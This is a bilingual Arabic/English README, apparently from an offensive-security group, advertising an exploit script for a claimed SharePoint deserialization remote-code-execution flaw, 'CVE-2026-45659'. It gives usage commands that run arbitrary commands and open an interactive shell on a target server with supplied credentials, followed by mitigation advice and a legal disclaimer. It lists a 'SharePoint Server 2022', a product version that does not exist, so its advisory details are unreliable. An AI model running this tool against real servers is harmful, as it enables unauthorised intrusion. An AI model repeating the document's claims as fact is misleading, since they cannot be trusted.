ثغرة أمنية في Microsoft SharePoint Server 2019/2022 و Subscription Edition تسمح لمستخدم مُصادق بصلاحيات منخفضة (Site Member) بتنفيذ أوامر عشوائية على الخادم (RCE). تستغل الثغرة آلية إلغاء التسلسل غير الآمنة (Unsafe Deserialization) في معالج LosFormatter.Deserialize داخل مكتبة Microsoft.SharePoint.Library.
| العنصر | التفاصيل |
|---|---|
| CVE | CVE-2026-45659 |
| CVSS | 8.8 (High) |
| النوع | Deserialization RCE |
| المعيار | CWE-502 (Deserialization of Untrusted Data) |
| الصلاحية المطلوبة | Site Member (مستخدم عادي) |
| المنتج | Microsoft SharePoint Server |
| المنتج | الحالة |
|---|---|
| SharePoint Server 2019 | ✅ متأثر |
| SharePoint Server 2022 | ✅ متأثر |
| SharePoint Subscription Edition | ✅ متأثر (ما قبل مايو 2026) |
SPListItem.Update()
│
▼
LosFormatter.Deserialize() ← بيانات غير آمنة
│
▼
ObjectStateFormatter ← لا يوجد filtering
│
▼
إنشاء كائن ضار → تنفيذ أوامر
مسار الكود الضعيف في Microsoft.SharePoint.Library يستخدم LosFormatter.Deserialize على بيانات يتحكم بها المهاجم من خلال دالة Update() لعناصر القوائم.
# تنفيذ أمر
python3 CVE-2026-45659.py -t https://sharepoint.target.com \
-u user@domain.com -p Pass123 \
-s "SiteName/ListName" -c "whoami /all"
# وضع شيل تفاعلي
python3 CVE-2026-45659.py -t https://sharepoint.target.com \
-u user@domain.com -p Pass123 \
-s "SiteName/ListName" --shell
# عبر بروكسي
python3 CVE-2026-45659.py -t https://sharepoint.target.com \
-u user@domain.com -p Pass123 \
-s "SiteName/ListName" -c "ipconfig" --proxy http://127.0.0.1:8080- صلاحية Site Member أو ما يعادلها
- قائمة مستهدفة تحتوي على عنصر واحد قابل للتعديل على الأقل
- الوصول إلى SharePoint عبر HTTPS
- تطبيق تحديث مايو 2026 من Microsoft
- تقييد صلاحيات المستخدمين إلى الحد الأدنى
- مراقبة استدعاءات SPListItem.Update() غير الطبيعية
- تفعيل Advanced Threat Protection في SharePoint
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-45659
- Microsoft Advisory: تحديث مايو 2026 الأمني
- AMN SECURITY Research: SharePoint Deserialization Analysis
| العضو | التخصص |
|---|---|
| AMN Research Team | اكتشاف الثغرة وتحليلها |
| AMN Exploitation Team | تطوير الإكسبلويت |
| AMN Defense Team | الإجراءات العلاجية |
A critical remote code execution vulnerability in Microsoft SharePoint Server 2019/2022 and Subscription Edition. An authenticated low-privileged user (Site Member) can achieve full RCE via unsafe deserialization in the SPListItem handling path.
| Property | Value |
|---|---|
| CVE | CVE-2026-45659 |
| CVSS | 8.8 (High) |
| CWE | CWE-502 (Unsafe Deserialization) |
| Required Privilege | Site Member (low-priv) |
| Attack Vector | Network |
| User Interaction | ❌ None |
| Product | SharePoint Server 2019/2022/SubEd |
| Product | Status |
|---|---|
| SharePoint Server 2019 | ✅ Affected |
| SharePoint Server 2022 | ✅ Affected |
| SharePoint Subscription Edition | ✅ Affected (pre-May 2026) |
The vulnerability exists in Microsoft.SharePoint.Library where LosFormatter.Deserialize is called on attacker-controlled data through the Update() method of list items with custom field types. No proper type filtering or ObjectStateFormatter restrictions are enforced.
# Execute command
python3 CVE-2026-45659.py -t https://sharepoint.target.com \
-u user@domain.com -p Pass123 \
-s "SiteName/ListName" -c "whoami /all"
# Interactive shell mode
python3 CVE-2026-45659.py -t https://sharepoint.target.com \
-u user@domain.com -p Pass123 \
-s "SiteName/ListName" --shell- Apply Microsoft May 2026 security update
- Restrict user permissions to minimum required
- Monitor abnormal SPListItem.Update() calls
- Enable Advanced Threat Protection
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-45659
- Microsoft Update: May 2026 Security Patch
- AMN SECURITY Research: SharePoint Deserialization RCE
🌐 Website: https://amn.amnoffsec.workers.dev/ 📸 Instagram: https://www.instagram.com/ixctw 📧 Email: ayman.mahmoudoffsec@gmail.com
This tool is provided for authorised security testing and educational purposes only. Unauthorised use is illegal. The authors and AMN SECURITY assume no liability for misuse.
🏴 AMN SECURITY — Enterprise Offensive Security